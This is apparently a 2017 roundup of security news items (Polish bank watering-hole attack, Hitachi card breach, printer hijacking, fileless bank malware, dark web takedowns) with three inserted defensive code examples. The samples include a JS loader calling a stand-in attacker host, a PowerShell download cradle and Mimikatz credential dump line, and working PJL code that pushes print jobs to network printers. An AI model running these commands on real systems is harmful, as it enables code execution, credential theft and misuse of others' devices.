POLAND SUCCUMBS TO FINANCIAL SECURITY BREACH

Polish banks are frantically scanning their workstations and servers and combing through logs for signs of infection after noticing unusual network activity and unauthorised files on key machines within their networks. This is, by far, the most serious information security incident seen in Poland.

It turned out to be a busy week in SOCs all across Poland. About a week ago, one of the banks detected unfamiliar malware on a few workstations. Having established basic indicators of compromise, it shared them with other banks, which started querying their SIEMs for matches. In some cases the results came back positive.

Preliminary investigation suggests that the starting point for the infection may have been the web server of the Polish financial sector regulator, the Polish Financial Supervision Authority (www.knf.gov.pl). A slight modification to one of the site's own local JS files caused an external JS file to be loaded, which could then execute malicious payloads on selected visitors: a watering-hole attack that turns a trusted regulator's site into the delivery channel.
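The tampering described above, a local script edited so that it pulls in code from elsewhere, is exactly what an integrity check on served assets is meant to catch. The following is an added example and not code from the article, from KNF or from any of the banks: it compares each served script with a known-good Subresource-Integrity-style hash and flags any script load from a host outside an allowlist. The sample files, the allowlist and the host evil-cdn.example.test are constructed for illustration; the real modified file on knf.gov.pl is not reproduced here.

```python
"""Added example, not code from the article or from KNF: compare served JS
against a known-good SRI hash and flag loads from unexpected hosts.
Sample files, allowlist and evil-cdn.example.test are constructed."""
import base64
import hashlib
import re
from typing import Dict, List, Set

# Hosts the site is expected to load scripts from (assumption for the example).
ALLOWED_HOSTS = {"www.knf.gov.pl"}


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Subresource Integrity string, e.g. 'sha384-<base64 digest>', the same
    form used in <script integrity="..."> so a baseline can be taken straight
    from the deployed HTML."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


# Script sources given either as an HTML tag or assigned to a created element.
SCRIPT_SRC_RE = re.compile(
    r"""(?:<script[^>]*\bsrc\s*=\s*|\.src\s*=\s*)["'](?:https?:)?//([^/"']+)""", re.I)


def external_hosts(js: str) -> Set[str]:
    """Hosts from which this script would load further scripts."""
    return {m.group(1).lower() for m in SCRIPT_SRC_RE.finditer(js)}


def audit(served: Dict[str, bytes], baseline: Dict[str, str]) -> List[str]:
    """Report each served file that differs from the baseline and every
    script host outside the allowlist, so a hash mismatch comes with a hint
    of where the new code would be fetched from."""
    findings: List[str] = []
    for path, content in served.items():
        expected = baseline.get(path)
        if expected is None:
            findings.append(f"{path}: not in baseline")
        elif sri_hash(content) != expected:
            findings.append(f"{path}: hash mismatch")
        hosts = external_hosts(content.decode("utf-8", "replace"))
        for host in sorted(hosts - ALLOWED_HOSTS):
            findings.append(f"{path}: loads script from {host}")
    return findings


# Constructed sample: the legitimate file loads one allowed script; the tampered
# copy is the same file with a loader for an attacker-controlled host appended.
ORIGINAL_JS = (
    b"document.getElementById('nav').classList.add('ready');\n"
    b"var a=document.createElement('script');"
    b"a.src='https://www.knf.gov.pl/js/analytics.js';document.head.appendChild(a);\n"
)
TAMPERED_JS = ORIGINAL_JS + (
    b";(function(){var s=document.createElement('script');"
    b"s.src='//evil-cdn.example.test/loader.js';document.head.appendChild(s);})();\n"
)
BASELINE = {"/js/site.js": sri_hash(ORIGINAL_JS)}

if __name__ == "__main__":
    print(audit({"/js/site.js": ORIGINAL_JS}, BASELINE))
    print(audit({"/js/site.js": TAMPERED_JS}, BASELINE))
```

Two caveats a practitioner would add: an `integrity` attribute on the `<script>` tag makes the browser itself refuse the altered file, but only while the HTML that carries the attribute is intact, and an attacker who can edit one file on the server can often edit another; a Content-Security-Policy `script-src` allowlist is the browser-side counterpart of ALLOWED_HOSTS and blocks the second-stage load even when the first-stage edit is missed.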

While the attackers' motivation is unknown, so far there is no report of direct financial losses incurred by banks or their customers as a result of this attack. More troubling, some of the victims were able to identify large outgoing data transfers.

While this should not come as a surprise, the incident illustrates the statement "you are going to get infected". The Polish financial sector has some of the best people and tools in security, and still it looks like the attackers breached it without major hurdles. On the good side, they were detected, and once notified, the banks were able to quickly identify infected machines and suspicious traffic patterns.

HACKING GANG AT LARGE FOR STEALTH

A hacker group in the Russian Federation whose members are suspected of stealing funds from accounts of Russian financial institutions has been dismantled, Irina Wolf, spokeswoman for the Ministry of Internal Affairs of the Russian Federation, stated.

"In May 2016, after effective interaction between the Ministry of Internal Affairs and the Federal Security Service of the Russian Federation, an unprecedented interdiction operation was carried out against the hacker group, whose members lived in 17 different locations of the country and had been involved in the misappropriation of funds from accounts of Russian financial institutions since 2013," Wolf stated in the report published on the website of the Ministry of Internal Affairs. "Over the period of its activity, 50 members managed to transfer more than 1 billion rubles."

The spokeswoman added that, besides bank accounts, the attackers had also hacked critical infrastructure, including strategic industrial enterprises.

Searches were conducted during which computers, storage media and means of communication, as well as firearms and edged weapons, were seized.

"At the moment, 27 organizers and participants of the group have been identified, of whom 19 suspects have been held criminally liable. The court has ordered their remand in custody," the statement on the website read. The matter remains under investigation.

Hitachi Payment Services admits its systems were compromised

Hitachi Payment Services has concluded an audit of the security breach, disclosed in October 2016, that compromised about 3.2 million debit cards issued by Indian banks. The Reserve Bank of India ordered the audit four months ago.

The company confirmed on Thursday that its systems were affected by "a sophisticated injection of malware (malicious software code)" that compromised details of debit cards issued by banks.

Hitachi Payment Services, which provides ATM, point-of-sale and other payment services in India, said security audit firm SISA Information Security has completed its final assessment report on the breach and found that the highly sophisticated malware worked undetected and concealed its tracks during the compromise period between May 21 and July 11, 2016.

"While the behavior of the malware and the penetration into the network has been deciphered, the amount of data exfiltrated during the above compromise period is unascertainable due to secure deletion by the malware," said a statement released by Hitachi Payment Services.

According to the National Payments Corporation of India (NPCI), which oversees payment systems in India, almost 90 ATMs in the country were compromised through the malware, and at least 641 customers across 19 banks lost Rs 1.3 crore to fraudulent transactions on their debit cards.

Loney Antony, managing director of Hitachi Payment Services, said, "...we confirm that our security systems had a breach during mid-2016. As soon as the breach was discovered, we followed due process and immediately informed the RBI, National Payments Corporation of India (NPCI), banks and card schemes. We also partnered with banks to ensure the safety of their customers' sensitive data. As a result, the extent of compromise was limited and we have not seen any further misuse due to the containment measures deployed by Hitachi Payment Services."

Hacker hijacked more than 150,000 printers

For many of us, hacking a printer seems next to impossible. Yet a hacker has hijacked more than 150,000 printers over the internet.

The attack affected all kinds of printers, from home devices to shop receipt printers. The hijacked printers were instructed to churn out pages carrying strange messages.

The affected internet-connected printers printed out this message: "Hacked. Stackoverflowin/stack the almighty, hacker god has returned to his throne, as the greatest memegod. Your printer is part of a flaming botnet. Your printer has been pwn'd."

The hacker, who uses the pseudonym Stackoverflowin, says he had no bad intentions and urges users to secure their printers properly.

He ran an automated program that scoured the internet for printers that were reachable from the internet with no basic security controls switched on.

"It was kind of on impulse," Stack told The Register. "I had been looking into printers for a while prior to this, about a few months before. I saw multiple articles about printers and it invoked my curiosity again, and yeah, it went from there."

"I used zmap to get the IPs with the targeted ports then a small 'loader' that I coded in C to actually do the print job and send the packet," Stack told The Register. "With most of these printers you can push your own firmware to them – the firmware doesn't need to be signed."

Shortly before this attack, a German academic study had found vulnerabilities in a wide range of printers.
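The two steps Stackoverflowin describes, finding printers that answer on their print ports and then pushing a job to them, rely on the fact that a raw network printer neither authenticates the sender nor checks where a job comes from. The code below is an added example and not his loader (which the article does not reproduce): it builds a PJL-wrapped job so the wire format is visible, sends a PJL identification query that doubles as a defender's exposure check, and runs both against an in-process mock printer so it can be executed offline. The article does not name the targeted ports; TCP 9100 (raw/JetDirect), 631 (IPP) and 515 (LPD) are assumed here as the usual ones, and the mock's model string is made up. Point the client functions at real hardware only if you own it or are authorised to test it.

```python
"""Added example, not the incident's code: a raw TCP/9100 PJL identification
probe plus a job builder, demonstrated against a constructed in-process mock
printer. Ports 9100/631/515 and the mock's model string are assumptions."""
import socket
import threading
import time
from typing import List, Optional, Tuple

RAW_PRINT_PORT = 9100        # raw/JetDirect; 631 (IPP) and 515 (LPD) are the other usual exposures
UEL = b"\x1b%-12345X"        # PJL Universal Exit Language sequence that frames every PJL job


def build_pjl_job(text: str, job_name: str = "probe") -> bytes:
    """Minimal PJL-wrapped job that prints `text` as plain ASCII. The printer
    accepts it from anyone who can open the port; there is no sender check."""
    body = text.replace("\n", "\r\n").encode("ascii", "replace")
    return (UEL + f'@PJL JOB NAME="{job_name}"\r\n'.encode("ascii")
            + b"@PJL ENTER LANGUAGE=PCL\r\n" + body + b"\x0c"    # form feed ejects the page
            + UEL + b"@PJL EOJ\r\n" + UEL)


def send_raw_job(host: str, port: int, payload: bytes, timeout: float = 3.0) -> bool:
    """Push a job to the raw port; True if the connection accepted it."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(payload)
        return True
    except OSError:
        return False


def query_printer_id(host: str, port: int = RAW_PRINT_PORT, timeout: float = 3.0) -> Optional[str]:
    """Send '@PJL INFO ID' and return the device's self-reported model string,
    or None if nothing PJL-like answers. An answer from a public address is
    exactly the exposure the scan in the article keyed on."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(UEL + b"@PJL INFO ID\r\n" + UEL)
            buf = b""
            while b"\x0c" not in buf:          # a PJL INFO reply ends with a form feed
                chunk = s.recv(4096)
                if not chunk:
                    break
                buf += chunk
    except OSError:
        return None
    for line in buf.decode("ascii", "replace").splitlines():
        line = line.strip()
        if len(line) >= 2 and line.startswith('"') and line.endswith('"'):
            return line[1:-1]
    return None


def start_mock_printer() -> Tuple[int, List[bytes]]:
    """Constructed stand-in for a printer: answers INFO ID like a real device
    and records every job it receives. Returns (port, received_payloads)."""
    received: List[bytes] = []
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))                 # ephemeral loopback port
    srv.listen()

    def serve() -> None:
        while True:
            conn, _ = srv.accept()
            with conn:
                conn.settimeout(2.0)
                try:
                    data = conn.recv(65536)
                except OSError:
                    continue
                received.append(data)
                if b"@PJL INFO ID" in data:
                    conn.sendall(b'@PJL INFO ID\r\n"MOCK LASERJET 0.1"\r\n\x0c')

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1], received


def demo() -> dict:
    """Run the whole exchange against the mock and return what each side saw."""
    port, received = start_mock_printer()
    printer_id = query_printer_id("127.0.0.1", port)
    accepted = send_raw_job("127.0.0.1", port,
                            build_pjl_job("This printer is reachable from the network.\n"))
    deadline = time.time() + 2.0
    while len(received) < 2 and time.time() < deadline:   # server thread records asynchronously
        time.sleep(0.02)
    return {"printer_id": printer_id, "job_accepted": accepted,
            "jobs_seen": len(received), "last_job": received[-1] if received else b""}


if __name__ == "__main__":
    print(demo())
```

The defensive reading of this is simple: if `query_printer_id` returns a model string when run from outside your network, the device is one zmap sweep away from joining the next wave; block the three ports at the perimeter and, where the firmware allows, require a job password or restrict the source addresses the printer accepts.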

Duqu malware's descendant strikes over 140 organisations across the globe

Security firm Kaspersky has found a descendant of the infamous Stuxnet family of malware that has infected more than 140 companies, banks, government bodies and telecom operators. Because the infections are so hard to spot, the actual number is likely much higher.

Stuxnet was the infamous computer worm, reportedly created by the US and Israel to sabotage Iran's nuclear program seven years ago. The fileless, "invisible" successor was discovered two years ago by the Moscow-based cybersecurity company, which dubbed it "Duqu 2.0", a more advanced form of the Duqu malware that was linked to Stuxnet in 2011.

The malware, which is now going mainstream, is used by criminals to siphon money out of bank accounts. It has been found in over 40 countries, including 21 instances in the United States. What makes the infections hard to detect is the use of legitimate and widely used system administration and security tools, including PowerShell, Metasploit and Mimikatz, to inject the malware directly into computer memory. "Unfortunately the use of common tools combined with different tricks makes detection very hard," said Kaspersky.

Virtually all of the malware resided solely in the memory of the compromised computers, which allowed the infections to remain undetected for six months or more. Techniques like these are becoming more common, especially against high-value targets in the banking industry.

This so-called fileless malware is distinctive in its ability to disappear after being installed on a server. Once the attacked computer is rebooted, the in-memory code is gone and the malware leaves almost no detectable trace of its existence on disk. It can take several months before sysadmins realise the machine has been infected, and during that time the attackers can steal freely from the coffers of the affected enterprise. The security firm published a report about the hidden malware on Wednesday (February 8) and will present more details in April.
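When the payload lives only in memory, the artefacts that do survive are the command lines and script blocks that put it there, which is why process-creation logging (Windows event 4688, Sysmon event 1) and PowerShell script-block logging (event 4104) are the usual starting points for this class of intrusion. The code below is an added example, not Kaspersky's detection logic or indicators: it triages process-creation command lines for the living-off-the-land tooling the report names, decodes PowerShell's `-EncodedCommand` argument (base64 of UTF-16LE text) so a download cradle hidden behind base64 is still matched, and runs over a few constructed log lines. The indicator patterns, the sample records and the 198.51.100.7 download host are assumptions made for the illustration.

```python
"""Added example, not Kaspersky's detection logic: triage process-creation
command lines for PowerShell/Metasploit/Mimikatz-style in-memory tooling,
decoding -EncodedCommand first. Patterns and sample records are constructed."""
import base64
import re
from typing import List, Optional, Tuple

# Indicator patterns (this example's assumptions, not IoCs from the report).
SUSPICIOUS = {
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b", re.I),
    "invoke_expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "mimikatz": re.compile(r"Invoke-Mimikatz|sekurlsa", re.I),
    "in_memory_load": re.compile(r"\[System\.Reflection\.Assembly\]::Load|FromBase64String|VirtualAlloc", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}
# -e / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """PowerShell's -EncodedCommand carries base64 of UTF-16LE text; recover it."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline: str) -> Tuple[List[str], Optional[str]]:
    """Return (sorted indicator names, decoded payload or None).
    Indicators are matched on the raw command line with the base64 blob masked
    out (so random base64 cannot trip a pattern) and again on the decoded text,
    so an encoded cradle is caught although the raw line shows only base64."""
    hits = set()
    decoded = decode_encoded_command(cmdline)
    m = ENCODED_RE.search(cmdline)
    if m:
        hits.add("encoded_command")
        cmdline = cmdline[:m.start(1)] + "<base64>" + cmdline[m.end(1):]
    hits |= {name for name, rx in SUSPICIOUS.items() if rx.search(cmdline)}
    if decoded:
        hits |= {name for name, rx in SUSPICIOUS.items() if rx.search(decoded)}
    return sorted(hits), decoded


def encode_for_powershell(script: str) -> str:
    """Produce what an operator passes to -EncodedCommand (used to build the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation records (the CommandLine field of
# Sysmon event 1 / Windows 4688); 198.51.100.7 is a documentation address.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage.ps1')"
SAMPLE_LOGS = [
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + encode_for_powershell(CRADLE),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\nightly-backup.ps1",
    'powershell.exe -c "Invoke-Mimikatz -DumpCreds"',
]


def triage(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Keep only the records that carry at least one indicator."""
    out = []
    for line in lines:
        names, _ = analyze(line)
        if names:
            out.append((line, names))
    return out


if __name__ == "__main__":
    for line, names in triage(SAMPLE_LOGS):
        print(names, "<-", line[:80])
```

Command-line triage is the cheap first pass; the second record above shows why it must stay conservative (a legitimate scheduled script with `-ExecutionPolicy Bypass` is not an indicator on its own). Script-block logging records the decoded content regardless of how it was launched, and a memory acquisition of the suspect host is what ultimately confirms the Meterpreter-style payload the report describes.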

The discovery gives institutions one more reason to worry on behalf of the average consumer. The new malware follows a trend of sophisticated, hard-to-detect attacks such as periscope skimming. That technique started showing up inside ATMs across the US last year and lets criminals harvest card data without the consumer or the bank noticing, since the hardware is installed inside the machine. Many banks are not adequately prepared to deal with such attacks.

Samara region protected from cyber threats through FinCERT

The Department of Information Technologies and Communications of Samara region (Russian Federation) has signed an information exchange agreement with FinCERT (the Bank of Russia's centre for monitoring and responding to computer attacks in the financial sphere, part of its General Directorate of Security and Information Protection), REGNUM news agency reports.

The regional government's press service explained that the bilateral cooperation between Samara region and FinCERT is meant for the exchange of information on recorded cyber attacks and on trends in the attack vectors used against information systems.

Authorised officials will be warned of information security incidents, indicators of compromise of systems, ongoing spam mailings and attempts to introduce malicious software.

The bilateral exchange of information has made it possible to share experience in combating modern cyber threats, to raise the level of competence and to develop generic scenarios for recovering from information security incidents.

As REGNUM previously reported, FinCERT collects, analyses and disseminates information on cyber attacks, develops recommendations for repelling them, and interacts with the FSB and other law enforcement and operational services. FinCERT's main activity is aimed at ensuring the information security of organisations in the credit and financial sphere.

nullcon Information Security Conference 8Bit, Goa 2017

nullcon was founded in 2010 with the idea of providing an integrated platform for exchanging information on the latest attack vectors, zero-day vulnerabilities and unknown threats. Our motto, "The neXt security thing!", drives the objective of the conference: to discuss and showcase the future of information security and the next generation of offensive and defensive security technology. The idea started as a gathering for researchers and organizations to brainstorm and demonstrate why current technology is not sufficient and what the focus for the coming years in information security should be. In addition to security, one section of the conference, called Desi Jugaad (Hindi for "Local Hack"), is dedicated to hacking in the broad sense: we invite researchers who come up with innovative security/tech/non-tech solutions for solving real-life challenges or taking up new initiatives.

The nullcon conference is a unique platform for security companies and evangelists to showcase their research and technology. nullcon hosts Prototype, an Exhibition, Trainings, Free Workshops and the null Job Fair at the conference. It is an integrated and structured platform that caters to the needs of the IT security industry at large in a comprehensive way.

The event consists of 25 talks and 11 training sessions covering all major topics of the IT security industry. The conference is created for security companies and enthusiasts so they can showcase the most up-to-date research and technology on the topic; the shared knowledge is usually put to use afterwards within the attendees' organizations. Moreover, we host an Exhibition, Free Workshops, CTF hacking competitions, a Job Fair, the BlackShield Awards and other events at the conference.

The Keynote will be addressed by Joshua Pennell, Founder & President, IOActive, following which we would have talks by various international security researchers on topics such as, ATM Hackings, Drone Hijacking, Telecom Protocol Security, Blockchain issues, Cloud Security, Bug Hunting, Social Engineering, Botnets and lots more.

With nullcon 8-bit edition we have made a lot of changes bringing the conference to the next level:
  • We anticipate 1000 attendees,
  • Additional DevOps Security Track,
  • New Trainings on Cloud Security, IoT, Infrastructure, Hardware Security,
  • New CXO Panel session,
  • Larger exhibition vendor area etc.

Nullcon Goa 2017 Dates:
  • Training - 28th Feb to 2nd March 2017
  • Conference - 3rd to 4th March 2017

New Venue:
Holiday Inn Resort, Mobor Beach, Cavelossim, Salcette, Goa - India.
Registration is still open! Get your pass here: http://nullcon.net/website/register-goa.php

We are happy to announce a 10% discount on a conference pass for E Hacking News readers! Don't miss your chance to visit Asia's leading information security conference!

Visit our website for more information: http://nullcon.net/website/
We are looking forward to seeing you at the conference!

Anonymous hacker knocks out a fifth of the Dark Web over child pornography

A hacktivist breached Freedom Hosting II, the largest hosting provider on the dark web, on February 3 and took down around 10,613 .onion websites, nearly a fifth of the dark web, for hosting child pornography.

The hacker also stole 75 GB of files and 2.6 GB of databases, which they offered to return for 0.1 bitcoin, around $100.

Freedom Hosting II is accessible only through the Tor network, which protects users' identity by hiding their internet activity from observers. The service hosted an estimated 15% to 20% of all dark web sites.

Visitors to websites running on Freedom Hosting II on February 3 saw a message explaining the hack.

“We have zero tolerance policy to child pornography,” said a hacker statement left on websites. “We do not forgive. We do not forget. You should have expected us,” added the statement.

Vigilantism is alive and well on the internet.

A few days ago, a hacker went onto the underground "dark web" and took down at least 2,000 sites hosting scam offers, political commentary and forums for child pornography.

Most of the dark web is not indexed by search engines. It is favoured by a gamut of users, from libertarians and political dissidents to gunrunners, drug markets, pedophiles and sex traffickers, who use Tor or set up anonymous .onion websites to hide their location and ply their illegal trade, which makes it difficult for law enforcement to unmask the criminals seeking refuge in the shadows.

Security researcher Chris Monteiro claimed the Freedom Hosting II hack may also have disrupted a substantial number of botnets, which are increasingly used by cybercriminals to launch large-scale DDoS attacks.

“I came across several child porn sites. That’s why I decided to search for an exploit and hack them,” the hacker told Newsweek. “I didn’t plan this attack, just had the right idea and took the opportunity after finding out what they were hosting,” added the hacktivist.

The European hacker, who wishes to remain anonymous, said it is the first time he has hacked anything but would do it again if there was an opportunity to target an illegal service.

The Anonymous hacktivist collective has carried out several campaigns against online child pornography, including Operation DarkNet in 2011, in which 40 child porn sites were hit with distributed denial of service (DDoS) attacks.

Stay protected against USB sticks

USB (Universal Serial Bus) flash drives have become ubiquitous storage devices for consumers and businesses alike, holding everything under the sun, from work files to personal photos. Businesses often rely on USB drives as a quick and easy backup tool for company data and applications.
But this easy access and widespread use also make them a major vector for shipping ransomware and malware into systems. For a long time, security researchers have warned individuals and businesses against using USB sticks to transfer sensitive data, yet many have paid no heed.

Because of a USB drive's small size it is easy to drop or misplace, which gives scammers an opportunity to scoop up orphaned drives and use the data on them for identity theft and other schemes.

Attackers also intentionally drop USB drives in public areas so that anyone who picks one up and plugs it into a computer can be compromised.

Malware can be transferred whenever an infected USB drive is plugged into a system.

Last month, North Korean defectors successfully shipped in "several thousand" USB sticks containing banned content such as South Korean soaps, Hollywood films and global news. While that transfer was harmless, many others can compromise the privacy and credentials of individuals and businesses.

The same month also saw the Spora ransomware spread in a highly sophisticated manner, removable drives included. It implemented an encryption scheme that does not need a command-and-control server, a user-friendly payment site, a choice of packages for victims including "immunity" from future attacks, and ransomware-as-a-service capability.

It's high time people understood that storing sensitive data on an unencrypted USB drive can prove disastrous, both financially and emotionally. A number of USB drives offer hardware encryption; sensitive data should be stored only on such devices, kept physically secure at home or in the office, and never carried out of the building. A separate drive can be carried with non-sensitive data for trips or offsite meetings.

Best practice also means not using anyone else's USB drive, even someone you know, because it may be pre-infected with malware; it is likewise in everyone's interest not to share your own.

Let anti-virus and anti-malware applications thoroughly scan all external storage devices, and disable the AutoRun/AutoPlay feature on your system so that nothing on an inserted drive is launched automatically. It's better to stay cautious than to suffer.

Researchers find way to protect quantum networks from hacking

Researchers at the University of Ottawa have found a way to protect quantum communication networks from external attacks. They managed to build "the first high-dimensional quantum cloning machine capable of performing quantum hacking to intercept a secure quantum message."

The University of Ottawa researchers published their work in the journal Science Advances, explaining that quantum communication systems, like conventional ones, can be targeted by an eavesdropper who tries to copy the information in transit.

Ebrahim Karimi from the University of Ottawa, Canada, said, "Our team has built the first high-dimensional quantum cloning machine capable of performing quantum hacking to intercept a secure quantum message."

"Once we were able to analyze the results, we discovered some very important clues to help protect quantum computing networks against potential hacking threats," added Karimi, who holds the Canada Research Chair in Structured Light.

Until now, quantum systems were believed to be perfectly secure for data transmission. This research paints a more nuanced picture: an attacker can attempt to clone the transmitted photons, but, as the team found, the attempt leaves detectable traces.

"What we found was that when larger amounts of quantum information are encoded on a single photon, the copies will get worse and hacking even simpler to detect," added Frederic Bouchard a University of Ottawa doctoral student.

"We showed that cloning attacks introduce specific, observable noises in a secure quantum communication channel. Ensuring photons contain the largest amount of information possible and monitoring these noises in a secure channel should help strengthen quantum computing networks against potential hacking threats," Bouchard added.

Darknet follows bug bounty lead

Closed networks are not solely hotbeds of crime and depravity; now a darknet marketplace hopes that putting bounties on bugs can help improve security for its clientele.

Darknet black markets are turning to bounty hunters to find security flaws in their systems. Hansa Market is one of them. In a world where anonymity is prized and exposure can lead to jail time, Hansa, a popular darknet marketplace for illicit goods, is following legitimate businesses by paying researchers who report security flaws, in order to keep its customers out of trouble.

According to CyberScoop, the marketplace, which brought in $3 million last year, has launched a bug bounty program offering rewards worth up to 10 BTC, or around $10,000. The biggest bounty, the full 10 BTC, is reserved for "vulnerabilities that could severely disrupt HANSA's integrity."

Considering that marketplaces like Hansa sell drugs, illegal firearms, log-ins and other data, the sites likely want to strengthen their security to protect their sellers from law enforcement. They also likely want to protect the log-in/password dumps and other data they have for sale from other hackers who might break in to steal them. Last week, Hansa announced on Reddit that it had launched a bitcoin bug bounty to keep clients safe.

Companies frequently create private networks to enable employees to use secure corporate servers, for example. And free software allows individuals to create what are called “peer-to-peer” networks, connecting directly from one machine to another.

Unable to be indexed by current search engines, and therefore less visible to the general public, subnetworks like these are often called "darknets", or collectively "the darknet". These networks typically use software such as Tor that anonymizes the machines connecting to them and encrypts the data travelling over their connections.

Bug bounties are gaining in popularity in the world of legitimate business as a means of improving product security.

However, Sarah Jamie Lewis, a privacy researcher who worked on the dark web security tool OnionScan, doesn't believe bug bounty programs can help darknet websites much. In her view bug bounties are only a patch; what is really needed is new privacy-oriented software stacks, servers, blog platforms and so on.

And some of what is on the darknet is alarming.

"Perusing the darknet offers a jarring jaunt through jaw-dropping depravity: galleries of child pornography, videos of humans having sex with animals, offers for sale of illegal drugs, weapons, stolen credit card numbers and fake identifications. Even human organs, reportedly from Chinese execution victims, are up for sale on the darknet," read a story from Fox News.

But portraying the darknet as primarily, or even solely, for criminals ignores the societal forces that push people toward these anonymous networks. One major darknet, called Freenet, indicates that darknets should be understood not as a crime-ridden “Wild West,” but rather as “wilderness,” spaces that by design are meant to remain unsullied by the civilising institutions—law enforcement, governments and corporations—that have come to dominate the internet.